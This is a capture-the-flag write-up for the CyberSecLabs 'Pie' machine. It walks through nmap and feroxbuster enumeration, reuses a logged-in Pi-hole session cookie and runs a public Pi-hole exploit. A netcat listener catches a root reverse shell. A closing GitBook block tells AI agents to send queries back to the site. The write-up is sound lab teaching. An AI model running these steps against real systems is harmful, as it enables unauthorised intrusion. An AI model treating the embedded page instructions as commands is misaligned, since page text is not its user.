> For the complete documentation index, see [llms.txt](https://viperone.gitbook.io/pentest-everything/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://viperone.gitbook.io/pentest-everything/writeups/cyberseclabs/linux/pie.md).
# Pie
## Nmap
```
nmap 172.31.1.26 -p- -A
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f6:a9:75:4c:34:de:ee:58:23:83:dc:b1:00:fc:3f:d4 (RSA)
| 256 26:44:00:05:82:b6:d2:2e:6a:34:34:91:83:73:fd:50 (ECDSA)
|_ 256 65:d2:02:da:22:74:71:5c:e1:30:3e:64:ea:37:a0:d3 (ED25519)
53/tcp open domain dnsmasq pi-hole-2.81
| dns-nsid:
|_ bind.version: dnsmasq-pi-hole-2.81
80/tcp open http lighttpd 1.4.45
|_http-server-header: lighttpd/1.4.45
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
## HTTP
Unless we opted to brute force SSH on port 22 HTTP on port 80 is going to be our best attack vector. The root page on 172.31.1.26 takes us to the following page for Pi-hole.
I decided to use feroboxbuster to enumerate further web directories. Using the `-s` switch we can select only results for specific return codes. The `-q` switch further reduces output.
```
feroxbuster -u http://172.31.1.26/ -s 301,200 -q
```
Browsing to we find we are already signed into the administrator's dashboard.
Going to help on the left and scrolling down we can see what version of Pi-hole we are running.
Performing a Google search for Pi-hole exploits one of the top results is from exploit-db.com which I have linked below.
{% embed url="" %}
This exploit meets our criteria where is affects versions of Pi-hole 4.4 and before. Other exploits also require knowing the password for authentication in which we do not. This exploit above requires a session cookie in which we can provide since are logged in.
In Firefox whilst logged into the dashboard we can open the console window with CTRL + SHIFT + I.
Move into storage and make a note of the value next to the PHPSESSID. This is our session cookie in which we need for the exploit.
Before we run the exploit start `netcat` with the following command:
```
nc -lvp 4455
```
When ready run the exploit with the following syntax:
```
sudo python3 exploit.py http://172.31.1.26/ 4455
```
When checking our `netcat` listener we should have caught a shell as root.
---
# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.
## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:
```
GET https://viperone.gitbook.io/pentest-everything/writeups/cyberseclabs/linux/pie.md?ask=&goal=
```
`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.